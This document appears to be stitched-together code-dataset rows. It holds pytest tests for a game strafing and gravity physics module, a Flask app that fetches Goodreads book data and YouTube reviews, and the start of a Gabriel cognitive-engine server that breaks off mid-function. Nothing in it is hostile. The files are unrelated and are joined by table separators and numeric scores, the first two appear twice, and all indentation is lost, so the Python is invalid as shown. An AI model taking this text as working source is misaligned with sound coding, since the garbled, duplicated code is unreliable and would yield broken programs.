motion.strafe_K(10, -10, 10, -10)
def test_strafe_speedxf():
with raises(ValueError):
motion.strafe_speedxf(4, 450, -10)
assert motion.strafe_speedxf(4, 450, 0) == 450
assert motion.strafe_speedxf(0, 0, 0) == 0
K = motion.strafe_K(30, 0.001, 320, 10)
assert motion.strafe_speedxf(4, 450, K) == approx(964.12654771)
assert motion.strafe_speedxf(0, 987, K) == 987
K = motion.strafe_K(30, 0.001, 320, 100)
assert motion.strafe_speedxf(4.2, 0, K) == approx(1944.222209522)
K = motion.strafe_K(320, 0.01, 320, 10)
assert motion.strafe_speedxf(2, 100, K) == approx(1975.145564256)
def test_strafe_speedxf_neg_time():
K = motion.strafe_K(320, 0.01, 320, 10)
with raises(ValueError):
motion.strafe_speedxf(-1, 0, K)
assert motion.strafe_speedxf(-1, 1451.068571777, K) == approx(400)
def test_strafe_distance():
K = motion.strafe_K(30, 0.001, 320, 10)
with raises(ValueError):
motion.strafe_distance(1, 100, -K)
assert motion.strafe_distance(0, 456, K) == 0
assert motion.strafe_distance(0, 1e5, 1e8) == 0
assert motion.strafe_distance(1, 100, K) == approx(304.32984903732694)
K = motion.strafe_K(30, 0.01, 320, 10)
assert motion.strafe_distance(2.5, 1, K) == approx(790.5746781033104)
assert motion.strafe_distance(1, -100, K) == approx(226.83538223469472)
assert motion.strafe_distance(1, 953.93920141694559, K) == approx(977.15056822651479)
def test_strafe_distance_neg_time():
K = motion.strafe_K(30, 0.01, 320, 10)
with raises(ValueError):
motion.strafe_distance(-1, 100, K)
assert motion.strafe_distance(-1, 1000, K) == approx(977.15056822651479)
def test_strafe_distance_zero_K():
assert motion.strafe_distance(1, 100, 1) == approx(100.00249995834504)
assert motion.strafe_distance(1, 100, 1e-5) == approx(100.00000086923438)
assert motion.strafe_distance(1, 100, 0) == 100
assert motion.strafe_distance(1, -100, 0) == 100
def test_strafe_time():
assert motion.strafe_time(400, 400, 1e-5) == approx(0.9999901521950959)
assert motion.strafe_time(400, 400, 0) == approx(1)
assert motion.strafe_time(0, 400, 0) == approx(0)
assert motion.strafe_time(1, 0, 0) == math.inf
K = motion.strafe_K(30, 0.001, 320, 10)
with raises(ValueError):
motion.strafe_time(100, 320, -K)
assert motion.strafe_time(100000, 320, K) == approx(49.314635892504114)
assert motion.strafe_time(100, 320, K) == approx(0.28012970263654435)
assert motion.strafe_time(0, 320, K) == approx(0)
assert motion.strafe_time(-100, 320, K) == approx(0.28012970263654435)
assert motion.strafe_time(-100, -320, K) == approx(0.28012970263654435)
K = motion.strafe_K(30, 0.001, 320, 100)
assert motion.strafe_time(1000, 320, K) == approx(1.2653051142112355)
assert motion.strafe_time(0, 320, K) == approx(0)
def test_strafe_time_extremes():
K = motion.strafe_K(30, 0.001, 320, 10)
xs = [0, 1e-15, 1e-10, 1e-9, 1e-8, 1e-7, 1e-6, 1e-5, 1e-4, 1e-3, 1e-2]
vs = [0, 1, 1e1, 1e2, 1e3, 1e4, 1e5, 1e6, 1e7, 1e8, 1e9, 1e10, 1e15]
for x, v in itertools.product(xs, vs):
assert motion.strafe_time(x, v, K) >= 0
def test_gravity_speediz_distance_time_zero_t():
assert motion.gravity_speediz_distance_time(0, 1, 800) == math.inf
assert motion.gravity_speediz_distance_time(0, -1, 800) == -math.inf
with raises(ValueError):
motion.gravity_speediz_distance_time(0, 0, 800)
with raises(ValueError):
motion.gravity_speediz_distance_time(0, 0, 0)
assert motion.gravity_speediz_distance_time(0, 1, 0) == math.inf
assert motion.gravity_speediz_distance_time(0, -1, 0) == -math.inf
def test_gravity_time_speediz_z():
assert motion.gravity_time_speediz_z(10, 10, 0) == (1, 1)
with raises(ZeroDivisionError):
motion.gravity_time_speediz_z(0, 10, 0)
assert motion.gravity_time_speediz_z(0, 0, 800) == (0, 0)
with raises(ValueError):
motion.gravity_time_speediz_z(0, 10, 800)
ret = motion.gravity_time_speediz_z(0, 10, -800)
assert ret[0] == approx(0.15811388300841897)
assert ret[1] == approx(-0.15811388300841897)
ret = motion.gravity_time_speediz_z(0, -10, 800)
assert ret[0] == approx(-0.15811388300841897)
assert ret[1] == approx(0.15811388300841897)
ret = motion.gravity_time_speediz_z(-100, 6.25, 800)
assert ret[0] == approx(-0.125)
assert ret[0] == approx(ret[1])
ret = motion.gravity_time_speediz_z(268, 20, 800)
assert ret[0] == approx(0.085550606334671569)
assert ret[1] == approx(0.58444939366532844)
ret = motion.gravity_time_speediz_z(268, -20, 560)
assert ret[0] == approx(-0.069570144084276309)
assert ret[1] == approx(1.0267130012271333)
def test_gravity_time_speediz_z_curve_shape():
vs = range(-1000, 1001, 50)
zs = range(-10000, 10000, 100)
for v, z in itertools.product(vs, zs):
try:
t = motion.gravity_time_speediz_z(v, z, 800)
except (ZeroDivisionError, ValueError):
continue
if math.isclose(t[0], t[1]):
continue
assert v - 800 * t[0] > 0
assert v - 800 * t[1] < 0
def test_strafe_solve_speedxi():
K = motion.strafe_K(30, 0.001, 320, 10)
with raises(ValueError):
motion.strafe_solve_speedxi(10, -K, 400, -200, 800)
def test_strafe_solve_speedxi_neg_z():
K = motion.strafe_K(30, 0.001, 320, 10)
assert motion.strafe_solve_speedxi(0, K, 100, -18, 800) == approx(450.6474498822009)
assert motion.strafe_solve_speedxi(0, K, 100, -100, 800) == approx(0)
assert motion.strafe_solve_speedxi(163.23541222592047, K, 100, -18, 800) == approx(0)
assert motion.strafe_solve_speedxi(200, K, 100, -18, 800) == approx(0)
assert motion.strafe_solve_speedxi(0, K, 100, -1e-3, 800) == approx(63245.55095141193)
assert motion.strafe_solve_speedxi(-10000, K, 100, -100, 800) == approx(10003.952996977921)
assert motion.strafe_solve_speedxi(-100, K, 200, -200, 800) == approx(248.98914739139963)
def test_strafe_solve_speedxi_pos_z():
K = motion.strafe_K(30, 0.001, 320, 10)
assert motion.strafe_solve_speedxi(1000, K, 100, 400, 800) == approx(0)
with raises(ValueError):
motion.strafe_solve_speedxi(1000, K, 100, 700, 800)
with raises(ValueError):
motion.strafe_solve_speedxi(0, K, 100, 700, 800)
def test_strafe_solve_speedxi_zero_z():
K = motion.strafe_K(30, 0.001, 320, 10)
assert motion.strafe_solve_speedxi(1000, K, 1, 0, 800) == math.inf
assert motion.strafe_solve_speedxi(0, K, 0, 0, 800) == approx(0)
assert motion.strafe_solve_speedxi(0, K, 100, 0, 800) == math.inf
assert motion.strafe_solve_speedxi(0, K, 1e-5, 0, 800) == math.inf
def test_strafe_solve_speedxi_zero_x():
K = motion.strafe_K(30, 0.001, 320, 10)
with raises(ValueError):
motion.strafe_solve_speedxi(0, K, 0, 1, 800)
with raises(ValueError):
motion.strafe_solve_speedxi(40, K, 0, 2, 800)
assert motion.strafe_solve_speedxi(40, K, 0, 1, 800) == approx(0)
def test_strafe_solve_speedxi_impossible():
K = motion.strafe_K(30, 0.001, 320, 10)
assert math.isnan(motion.strafe_solve_speedxi(-100, K, 0, 2, 800))
assert math.isnan(motion.strafe_solve_speedxi(-100, K, 10, 2, 800))
with raises(ValueError):
motion.strafe_solve_speedxi(0, K, 10, 2, 800)
def test_strafe_solve_speedxi_curve_shape():
K = motion.strafe_K(30, 0.001, 320, 10)
xs = range(1, 10000, 500)
zs = range(1, 601, 100)
for x, z in itertools.product(xs, zs):
vix = motion.strafe_solve_speedxi(1000, K, x, z, 800)
tx = motion.strafe_time(x, vix, K)
tz = motion.gravity_time_speediz_z(1000, z, 800)
if not math.isclose(tx, tz[0], abs_tol=1e-6):
assert tx <= tz[0]
def test_solve_boost_min_dmg():
K = motion.strafe_K(30, 0.001, 320, 10)
with raises(ValueError):
motion.solve_boost_min_dmg([0, 0], -K, 400, 400, 800)
dv = motion.solve_boost_min_dmg([0, 0], K, 400, 400, 800)
assert dv[0] == approx(79.399032802535118, 1e-4)
assert dv[1] == approx(816.5301806366407, 1e-4)
t = motion.gravity_time_speediz_z(dv[1], 400, 800)
assert t[1] == approx(motion.strafe_time(400, dv[0], K))
assert dv[1] - 800 * t[1] <= 0
def test_solve_boost_min_dmg_neg_z():
K = motion.strafe_K(30, 0.001, 320, 10)
dv = motion.solve_boost_min_dmg([400, 268], K, 1500, -200, 800)
assert dv[0] == approx(298.46589871993854, 1e-4)
assert dv[1] == approx(366.81197893286605, 1e-4)
K = motion.strafe_K(30, 0.001, 320, 100)
dv = motion.solve_boost_min_dmg([400, 268], K, 1500, -200, 800)
assert dv[0] == approx(77.238561539572189, 1e-4)
assert dv[1] == approx(241.47957829048562, 1e-4)
dv = motion.solve_boost_min_dmg([0, 0], K, 0, -200, 800)
assert dv[0] == approx(0)
assert dv[1] == approx(0)
def test_solve_boost_min_dmg_neg_viz():
K = motion.strafe_K(30, 0.001, 320, 100)
dv = motion.solve_boost_min_dmg([0, -600], K, 300, -200, 800)
assert dv[0] == approx(51.986602324707007)
assert dv[1] == approx(511.7601499627252)
tx = motion.strafe_time(300, dv[0], K)
tz = motion.gravity_time_speediz_z(-600 + dv[1], -200, 800)
assert tx == approx(tz[1])
K = motion.strafe_K(30, 0.001, 320, 10)
dv = motion.solve_boost_min_dmg([0, -600], K, 1000, 500, 800)
assert dv[0] == approx(520.92144757654194)
assert dv[1] == approx(1545.1246586237653)
tx = motion.strafe_time(1000, dv[0], K)
tz = motion.gravity_time_speediz_z(-600 + dv[1], 500, 800)
assert tx == approx(tz[1])
def test_solve_boost_min_dmg_range():
K = motion.strafe_K(30, 0.001, 320, 10)
for d in itertools.chain(range(-10000, 10001, 100), np.arange(-100, 100, 0.5)):
dv = motion.solve_boost_min_dmg([0, 0], K, d, d, 800)
assert dv[0] < 1e4 and dv[1] < 1e4
assert dv[0] >= 0 and dv[1] >= 0
t = motion.gravity_time_speediz_z(dv[1], d, 800)
assert dv[1] - 800 * t[1] <= 0
strafe_t = motion.strafe_time(d, dv[0], K)
if not math.isclose(t[1], strafe_t):
assert t[1] > strafe_t
if not math.isclose(t[0], strafe_t):
assert t[0] < strafe_t
dv = motion.solve_boost_min_dmg(dv, K, d, d, 800)
assert dv[0] == approx(0, abs=1e-5)
assert dv[1] == approx(0, abs=1e-5)
dv = motion.solve_boost_min_dmg([0, 0], K, 400, d, 800)
assert dv[0] < 1e4 and dv[1] < 1e4
def test_solve_boost_min_dmg_inc_v():
K = motion.strafe_K(30, 0.001, 320, 10)
prev = math.inf
for vx in range(0, 10000, 100):
dv = motion.solve_boost_min_dmg([vx, 0], K, 1500, -200, 800)
mag = math.hypot(dv[0], dv[1])
assert mag <= prev
prev = mag
prev = math.inf
for vy in range(0, 10000, 100):
dv = motion.solve_boost_min_dmg([0, vy], K, 1500, -200, 800)
mag = math.hypot(dv[0], dv[1])
assert mag <= prev
prev = mag
def test_solve_boost_min_dmg_zero_pos():
np.warnings.filterwarnings('ignore')
K = motion.strafe_K(30, 0.001, 320, 10)
dv = motion.solve_boost_min_dmg([400, 0], K, 0, -1, 800)
assert dv[0] == approx(0, abs=1e-5)
assert dv[1] == approx(0, abs=1e-5)
dv = motion.solve_boost_min_dmg([0, 0], K, 0, 1, 800)
assert dv[1] >= 1e4
dv = motion.solve_boost_min_dmg([200, 200], K, 0, 0, 800)
assert dv[0] == approx(0, abs=1e-5)
assert dv[1] == approx(0, abs=1e-5)
np.warnings.filterwarnings('default')
def test_solve_boost_min_dmg_neg_x():
K = motion.strafe_K(30, 0.001, 320, 10)
dv1 = motion.solve_boost_min_dmg([0, 0], K, -400, 500, 800)
dv2 = motion.solve_boost_min_dmg([0, 0], K, 400, 500, 800)
assert dv1 == dv2
def test_solve_boost_min_dmg_no_dv():
K = motion.strafe_K(30, 0.001, 320, 10)
dv = motion.solve_boost_min_dmg([0, 0], K, 100, -100000, 800)
assert dv[0] == approx(0, abs=1e-5)
dv = motion.solve_boost_min_dmg([10000, 0], K, 1000, -10, 800)
assert dv[0] == approx(0, abs=1e-5)
assert dv[1] == approx(0, abs=1e-5)
dv = motion.solve_boost_min_dmg([0, 1500], K, 500, 1000, 800)
assert dv[0] == approx(0, abs=1e-5)
assert dv[1] == approx(0, abs=1e-5) | pystrafe/tests/test_motion.py | import math
import itertools
import numpy as np
from pytest import raises, approx
from pystrafe import motion
def test_strafe_K():
with raises(ZeroDivisionError):
motion.strafe_K(0, 0, 0, 0)
assert motion.strafe_K(30, 0.001, 320, 0) == 0.0
assert motion.strafe_K(30, 0.01, 320, 10) == approx(90000)
assert motion.strafe_K(30, 0.001, 320, 10) == approx(181760)
assert motion.strafe_K(320, 0.001, 320, 10) == approx(2037760)
assert motion.strafe_K(320, 0.001, 320, 2000) == approx(102400000)
assert motion.strafe_K(30, 0.001, 10, 10) == approx(1990)
assert motion.strafe_K(30, 0.001, 0, 10) == 0
def test_strafe_K_neg_params():
with raises(ValueError):
motion.strafe_K(-10, 10, 10, 10)
with raises(ValueError):
motion.strafe_K(10, -10, 10, 10)
with raises(ValueError):
motion.strafe_K(10, 10, -10, 10)
with raises(ValueError):
motion.strafe_K(10, -10, 10, -10)
def test_strafe_speedxf():
with raises(ValueError):
motion.strafe_speedxf(4, 450, -10)
assert motion.strafe_speedxf(4, 450, 0) == 450
assert motion.strafe_speedxf(0, 0, 0) == 0
K = motion.strafe_K(30, 0.001, 320, 10)
assert motion.strafe_speedxf(4, 450, K) == approx(964.12654771)
assert motion.strafe_speedxf(0, 987, K) == 987
K = motion.strafe_K(30, 0.001, 320, 100)
assert motion.strafe_speedxf(4.2, 0, K) == approx(1944.222209522)
K = motion.strafe_K(320, 0.01, 320, 10)
assert motion.strafe_speedxf(2, 100, K) == approx(1975.145564256)
def test_strafe_speedxf_neg_time():
K = motion.strafe_K(320, 0.01, 320, 10)
with raises(ValueError):
motion.strafe_speedxf(-1, 0, K)
assert motion.strafe_speedxf(-1, 1451.068571777, K) == approx(400)
def test_strafe_distance():
K = motion.strafe_K(30, 0.001, 320, 10)
with raises(ValueError):
motion.strafe_distance(1, 100, -K)
assert motion.strafe_distance(0, 456, K) == 0
assert motion.strafe_distance(0, 1e5, 1e8) == 0
assert motion.strafe_distance(1, 100, K) == approx(304.32984903732694)
K = motion.strafe_K(30, 0.01, 320, 10)
assert motion.strafe_distance(2.5, 1, K) == approx(790.5746781033104)
assert motion.strafe_distance(1, -100, K) == approx(226.83538223469472)
assert motion.strafe_distance(1, 953.93920141694559, K) == approx(977.15056822651479)
def test_strafe_distance_neg_time():
K = motion.strafe_K(30, 0.01, 320, 10)
with raises(ValueError):
motion.strafe_distance(-1, 100, K)
assert motion.strafe_distance(-1, 1000, K) == approx(977.15056822651479)
def test_strafe_distance_zero_K():
assert motion.strafe_distance(1, 100, 1) == approx(100.00249995834504)
assert motion.strafe_distance(1, 100, 1e-5) == approx(100.00000086923438)
assert motion.strafe_distance(1, 100, 0) == 100
assert motion.strafe_distance(1, -100, 0) == 100
def test_strafe_time():
assert motion.strafe_time(400, 400, 1e-5) == approx(0.9999901521950959)
assert motion.strafe_time(400, 400, 0) == approx(1)
assert motion.strafe_time(0, 400, 0) == approx(0)
assert motion.strafe_time(1, 0, 0) == math.inf
K = motion.strafe_K(30, 0.001, 320, 10)
with raises(ValueError):
motion.strafe_time(100, 320, -K)
assert motion.strafe_time(100000, 320, K) == approx(49.314635892504114)
assert motion.strafe_time(100, 320, K) == approx(0.28012970263654435)
assert motion.strafe_time(0, 320, K) == approx(0)
assert motion.strafe_time(-100, 320, K) == approx(0.28012970263654435)
assert motion.strafe_time(-100, -320, K) == approx(0.28012970263654435)
K = motion.strafe_K(30, 0.001, 320, 100)
assert motion.strafe_time(1000, 320, K) == approx(1.2653051142112355)
assert motion.strafe_time(0, 320, K) == approx(0)
def test_strafe_time_extremes():
K = motion.strafe_K(30, 0.001, 320, 10)
xs = [0, 1e-15, 1e-10, 1e-9, 1e-8, 1e-7, 1e-6, 1e-5, 1e-4, 1e-3, 1e-2]
vs = [0, 1, 1e1, 1e2, 1e3, 1e4, 1e5, 1e6, 1e7, 1e8, 1e9, 1e10, 1e15]
for x, v in itertools.product(xs, vs):
assert motion.strafe_time(x, v, K) >= 0
def test_gravity_speediz_distance_time_zero_t():
assert motion.gravity_speediz_distance_time(0, 1, 800) == math.inf
assert motion.gravity_speediz_distance_time(0, -1, 800) == -math.inf
with raises(ValueError):
motion.gravity_speediz_distance_time(0, 0, 800)
with raises(ValueError):
motion.gravity_speediz_distance_time(0, 0, 0)
assert motion.gravity_speediz_distance_time(0, 1, 0) == math.inf
assert motion.gravity_speediz_distance_time(0, -1, 0) == -math.inf
def test_gravity_time_speediz_z():
assert motion.gravity_time_speediz_z(10, 10, 0) == (1, 1)
with raises(ZeroDivisionError):
motion.gravity_time_speediz_z(0, 10, 0)
assert motion.gravity_time_speediz_z(0, 0, 800) == (0, 0)
with raises(ValueError):
motion.gravity_time_speediz_z(0, 10, 800)
ret = motion.gravity_time_speediz_z(0, 10, -800)
assert ret[0] == approx(0.15811388300841897)
assert ret[1] == approx(-0.15811388300841897)
ret = motion.gravity_time_speediz_z(0, -10, 800)
assert ret[0] == approx(-0.15811388300841897)
assert ret[1] == approx(0.15811388300841897)
ret = motion.gravity_time_speediz_z(-100, 6.25, 800)
assert ret[0] == approx(-0.125)
assert ret[0] == approx(ret[1])
ret = motion.gravity_time_speediz_z(268, 20, 800)
assert ret[0] == approx(0.085550606334671569)
assert ret[1] == approx(0.58444939366532844)
ret = motion.gravity_time_speediz_z(268, -20, 560)
assert ret[0] == approx(-0.069570144084276309)
assert ret[1] == approx(1.0267130012271333)
def test_gravity_time_speediz_z_curve_shape():
vs = range(-1000, 1001, 50)
zs = range(-10000, 10000, 100)
for v, z in itertools.product(vs, zs):
try:
t = motion.gravity_time_speediz_z(v, z, 800)
except (ZeroDivisionError, ValueError):
continue
if math.isclose(t[0], t[1]):
continue
assert v - 800 * t[0] > 0
assert v - 800 * t[1] < 0
def test_strafe_solve_speedxi():
K = motion.strafe_K(30, 0.001, 320, 10)
with raises(ValueError):
motion.strafe_solve_speedxi(10, -K, 400, -200, 800)
def test_strafe_solve_speedxi_neg_z():
K = motion.strafe_K(30, 0.001, 320, 10)
assert motion.strafe_solve_speedxi(0, K, 100, -18, 800) == approx(450.6474498822009)
assert motion.strafe_solve_speedxi(0, K, 100, -100, 800) == approx(0)
assert motion.strafe_solve_speedxi(163.23541222592047, K, 100, -18, 800) == approx(0)
assert motion.strafe_solve_speedxi(200, K, 100, -18, 800) == approx(0)
assert motion.strafe_solve_speedxi(0, K, 100, -1e-3, 800) == approx(63245.55095141193)
assert motion.strafe_solve_speedxi(-10000, K, 100, -100, 800) == approx(10003.952996977921)
assert motion.strafe_solve_speedxi(-100, K, 200, -200, 800) == approx(248.98914739139963)
def test_strafe_solve_speedxi_pos_z():
K = motion.strafe_K(30, 0.001, 320, 10)
assert motion.strafe_solve_speedxi(1000, K, 100, 400, 800) == approx(0)
with raises(ValueError):
motion.strafe_solve_speedxi(1000, K, 100, 700, 800)
with raises(ValueError):
motion.strafe_solve_speedxi(0, K, 100, 700, 800)
def test_strafe_solve_speedxi_zero_z():
K = motion.strafe_K(30, 0.001, 320, 10)
assert motion.strafe_solve_speedxi(1000, K, 1, 0, 800) == math.inf
assert motion.strafe_solve_speedxi(0, K, 0, 0, 800) == approx(0)
assert motion.strafe_solve_speedxi(0, K, 100, 0, 800) == math.inf
assert motion.strafe_solve_speedxi(0, K, 1e-5, 0, 800) == math.inf
def test_strafe_solve_speedxi_zero_x():
K = motion.strafe_K(30, 0.001, 320, 10)
with raises(ValueError):
motion.strafe_solve_speedxi(0, K, 0, 1, 800)
with raises(ValueError):
motion.strafe_solve_speedxi(40, K, 0, 2, 800)
assert motion.strafe_solve_speedxi(40, K, 0, 1, 800) == approx(0)
def test_strafe_solve_speedxi_impossible():
K = motion.strafe_K(30, 0.001, 320, 10)
assert math.isnan(motion.strafe_solve_speedxi(-100, K, 0, 2, 800))
assert math.isnan(motion.strafe_solve_speedxi(-100, K, 10, 2, 800))
with raises(ValueError):
motion.strafe_solve_speedxi(0, K, 10, 2, 800)
def test_strafe_solve_speedxi_curve_shape():
K = motion.strafe_K(30, 0.001, 320, 10)
xs = range(1, 10000, 500)
zs = range(1, 601, 100)
for x, z in itertools.product(xs, zs):
vix = motion.strafe_solve_speedxi(1000, K, x, z, 800)
tx = motion.strafe_time(x, vix, K)
tz = motion.gravity_time_speediz_z(1000, z, 800)
if not math.isclose(tx, tz[0], abs_tol=1e-6):
assert tx <= tz[0]
def test_solve_boost_min_dmg():
K = motion.strafe_K(30, 0.001, 320, 10)
with raises(ValueError):
motion.solve_boost_min_dmg([0, 0], -K, 400, 400, 800)
dv = motion.solve_boost_min_dmg([0, 0], K, 400, 400, 800)
assert dv[0] == approx(79.399032802535118, 1e-4)
assert dv[1] == approx(816.5301806366407, 1e-4)
t = motion.gravity_time_speediz_z(dv[1], 400, 800)
assert t[1] == approx(motion.strafe_time(400, dv[0], K))
assert dv[1] - 800 * t[1] <= 0
def test_solve_boost_min_dmg_neg_z():
K = motion.strafe_K(30, 0.001, 320, 10)
dv = motion.solve_boost_min_dmg([400, 268], K, 1500, -200, 800)
assert dv[0] == approx(298.46589871993854, 1e-4)
assert dv[1] == approx(366.81197893286605, 1e-4)
K = motion.strafe_K(30, 0.001, 320, 100)
dv = motion.solve_boost_min_dmg([400, 268], K, 1500, -200, 800)
assert dv[0] == approx(77.238561539572189, 1e-4)
assert dv[1] == approx(241.47957829048562, 1e-4)
dv = motion.solve_boost_min_dmg([0, 0], K, 0, -200, 800)
assert dv[0] == approx(0)
assert dv[1] == approx(0)
def test_solve_boost_min_dmg_neg_viz():
K = motion.strafe_K(30, 0.001, 320, 100)
dv = motion.solve_boost_min_dmg([0, -600], K, 300, -200, 800)
assert dv[0] == approx(51.986602324707007)
assert dv[1] == approx(511.7601499627252)
tx = motion.strafe_time(300, dv[0], K)
tz = motion.gravity_time_speediz_z(-600 + dv[1], -200, 800)
assert tx == approx(tz[1])
K = motion.strafe_K(30, 0.001, 320, 10)
dv = motion.solve_boost_min_dmg([0, -600], K, 1000, 500, 800)
assert dv[0] == approx(520.92144757654194)
assert dv[1] == approx(1545.1246586237653)
tx = motion.strafe_time(1000, dv[0], K)
tz = motion.gravity_time_speediz_z(-600 + dv[1], 500, 800)
assert tx == approx(tz[1])
def test_solve_boost_min_dmg_range():
K = motion.strafe_K(30, 0.001, 320, 10)
for d in itertools.chain(range(-10000, 10001, 100), np.arange(-100, 100, 0.5)):
dv = motion.solve_boost_min_dmg([0, 0], K, d, d, 800)
assert dv[0] < 1e4 and dv[1] < 1e4
assert dv[0] >= 0 and dv[1] >= 0
t = motion.gravity_time_speediz_z(dv[1], d, 800)
assert dv[1] - 800 * t[1] <= 0
strafe_t = motion.strafe_time(d, dv[0], K)
if not math.isclose(t[1], strafe_t):
assert t[1] > strafe_t
if not math.isclose(t[0], strafe_t):
assert t[0] < strafe_t
dv = motion.solve_boost_min_dmg(dv, K, d, d, 800)
assert dv[0] == approx(0, abs=1e-5)
assert dv[1] == approx(0, abs=1e-5)
dv = motion.solve_boost_min_dmg([0, 0], K, 400, d, 800)
assert dv[0] < 1e4 and dv[1] < 1e4
def test_solve_boost_min_dmg_inc_v():
K = motion.strafe_K(30, 0.001, 320, 10)
prev = math.inf
for vx in range(0, 10000, 100):
dv = motion.solve_boost_min_dmg([vx, 0], K, 1500, -200, 800)
mag = math.hypot(dv[0], dv[1])
assert mag <= prev
prev = mag
prev = math.inf
for vy in range(0, 10000, 100):
dv = motion.solve_boost_min_dmg([0, vy], K, 1500, -200, 800)
mag = math.hypot(dv[0], dv[1])
assert mag <= prev
prev = mag
def test_solve_boost_min_dmg_zero_pos():
np.warnings.filterwarnings('ignore')
K = motion.strafe_K(30, 0.001, 320, 10)
dv = motion.solve_boost_min_dmg([400, 0], K, 0, -1, 800)
assert dv[0] == approx(0, abs=1e-5)
assert dv[1] == approx(0, abs=1e-5)
dv = motion.solve_boost_min_dmg([0, 0], K, 0, 1, 800)
assert dv[1] >= 1e4
dv = motion.solve_boost_min_dmg([200, 200], K, 0, 0, 800)
assert dv[0] == approx(0, abs=1e-5)
assert dv[1] == approx(0, abs=1e-5)
np.warnings.filterwarnings('default')
def test_solve_boost_min_dmg_neg_x():
K = motion.strafe_K(30, 0.001, 320, 10)
dv1 = motion.solve_boost_min_dmg([0, 0], K, -400, 500, 800)
dv2 = motion.solve_boost_min_dmg([0, 0], K, 400, 500, 800)
assert dv1 == dv2
def test_solve_boost_min_dmg_no_dv():
K = motion.strafe_K(30, 0.001, 320, 10)
dv = motion.solve_boost_min_dmg([0, 0], K, 100, -100000, 800)
assert dv[0] == approx(0, abs=1e-5)
dv = motion.solve_boost_min_dmg([10000, 0], K, 1000, -10, 800)
assert dv[0] == approx(0, abs=1e-5)
assert dv[1] == approx(0, abs=1e-5)
dv = motion.solve_boost_min_dmg([0, 1500], K, 500, 1000, 800)
assert dv[0] == approx(0, abs=1e-5)
assert dv[1] == approx(0, abs=1e-5) | 0.653127 | 0.777975 |
from flask import Flask, render_template, request, jsonify
from goodreads_search import search_book, get_book_isbn
from review_parser import scrape_reviews
from youtube_search import get_video_ids
from pprint import pprint
from time import time
app = Flask(__name__)
@app.route("/")
def index():
return render_template("index.html")
@app.route("/book_info", methods=["POST"])
def show_book_info_page():
start_time = time()
book_title = request.form["book_title"]
book_dict = search_book(book_title, "title", 1)[0]
# enlarging the image(which is initially low-quality) by editing its url
book_cover_url = book_dict["best_book"]["image_url"][:-7] + "318_.jpg" if book_dict["best_book"]["image_url"][
-5] == "_" else \
book_dict["best_book"]["image_url"]
book_cover_url = f"background-image:url('{book_cover_url}');"
# video_start = time()
youtube_video_id = get_video_ids(book_dict["best_book"]["title"] + " book review", 1)[0]
# print(f"Found video. Took {time() - video_start} seconds")
print(f"Finished. Took {time() - start_time} seconds")
return render_template("book.html", book_dict=book_dict, book_cover_url=book_cover_url,
youtube_video_id=youtube_video_id, book_id=str(book_dict["best_book"]["id"]))
@app.route("/get_reviews")
def get_reviews():
book_id = request.args.get("book_id")
pprint("book_id")
book_isbn = get_book_isbn(book_id)
pprint(book_isbn)
scrape_start = time()
reviews = scrape_reviews(book_isbn).get_mood_range()
print(f"Scraped. Took {time() - scrape_start} seconds")
review_dict = {}
for id, review in enumerate(reviews):
review_dict[id] = {"text": review.text, "author": review.author}
print(review_dict[id])
return jsonify(result=review_dict)
# enter the code below to launch the web server
# FLASK_APP=app.py FLASK_ENV=development flask run | app.py | from flask import Flask, render_template, request, jsonify
from goodreads_search import search_book, get_book_isbn
from review_parser import scrape_reviews
from youtube_search import get_video_ids
from pprint import pprint
from time import time
app = Flask(__name__)
@app.route("/")
def index():
return render_template("index.html")
@app.route("/book_info", methods=["POST"])
def show_book_info_page():
start_time = time()
book_title = request.form["book_title"]
book_dict = search_book(book_title, "title", 1)[0]
# enlarging the image(which is initially low-quality) by editing its url
book_cover_url = book_dict["best_book"]["image_url"][:-7] + "318_.jpg" if book_dict["best_book"]["image_url"][
-5] == "_" else \
book_dict["best_book"]["image_url"]
book_cover_url = f"background-image:url('{book_cover_url}');"
# video_start = time()
youtube_video_id = get_video_ids(book_dict["best_book"]["title"] + " book review", 1)[0]
# print(f"Found video. Took {time() - video_start} seconds")
print(f"Finished. Took {time() - start_time} seconds")
return render_template("book.html", book_dict=book_dict, book_cover_url=book_cover_url,
youtube_video_id=youtube_video_id, book_id=str(book_dict["best_book"]["id"]))
@app.route("/get_reviews")
def get_reviews():
book_id = request.args.get("book_id")
pprint("book_id")
book_isbn = get_book_isbn(book_id)
pprint(book_isbn)
scrape_start = time()
reviews = scrape_reviews(book_isbn).get_mood_range()
print(f"Scraped. Took {time() - scrape_start} seconds")
review_dict = {}
for id, review in enumerate(reviews):
review_dict[id] = {"text": review.text, "author": review.author}
print(review_dict[id])
return jsonify(result=review_dict)
# enter the code below to launch the web server
# FLASK_APP=app.py FLASK_ENV=development flask run | 0.274157 | 0.124107 |
import asyncio
import logging
import multiprocessing
import os
import queue
from gabriel_protocol import gabriel_pb2
from gabriel_server import cognitive_engine
from gabriel_server.websocket_server import WebsocketServer
_NUM_BYTES_FOR_SIZE = 4
_BYTEORDER = 'big'
logger = logging.getLogger(__name__)
def run(engine_factory, filter_name, input_queue_maxsize, port, num_tokens):
try:
input_queue = multiprocessing.Queue(input_queue_maxsize)
read, write = os.pipe()
local_server = _LocalServer(port, num_tokens, input_queue, read)
local_server.add_filter_consumed(filter_name)
engine_process = multiprocessing.Process(
target=_run_engine, args=(engine_factory, input_queue, read, write))
engine_process.start()
os.close(write)
local_server.launch()
finally:
local_server.cleanup()
os.close(read)
raise Exception('Server stopped')
class _LocalServer(WebsocketServer):
def __init__(self, port, num_tokens_per_filter, input_queue, read):
super().__init__(port, num_tokens_per_filter)
self._input_queue = input_queue
loop = asyncio.get_event_loop()
self._stream_reader = asyncio.StreamReader(loop=loop)
def protocol_factory():
return asyncio.StreamReaderProtocol(self._stream_reader)
pipe = os.fdopen(read, mode='r')
self._transport, _ = loop.run_until_complete(
loop.connect_read_pipe(protocol_factory, pipe))
def cleanup(self):
self._transport.close()
async def _send_to_engine(self, to_engine):
try:
# I did not check self._input_queue full() because the docs say that
# multiprocessing.Queue().full() is not reliable.
self._input_queue.put_nowait(to_engine.SerializeToString())
except queue.Full:
return False
return True
async def _recv_from_engine(self):
'''Read serialized protobuf message.
The size of the bytestring is read. Then the bytestring itself is
read.'''
size_bytes = await self._stream_reader.readexactly(_NUM_BYTES_FOR_SIZE)
size_of_message = int.from_bytes(size_bytes, _BYTEORDER)
from_engine_serialized = await self._stream_reader.readexactly(
size_of_message)
from_engine = gabriel_pb2.FromEngine()
from_engine.ParseFromString(from_engine_serialized)
return from_engine
def _run_engine(engine_factory, input_queue, read, write):
try:
os.close(read)
engine = engine_factory()
logger.info('Cognitive engine started')
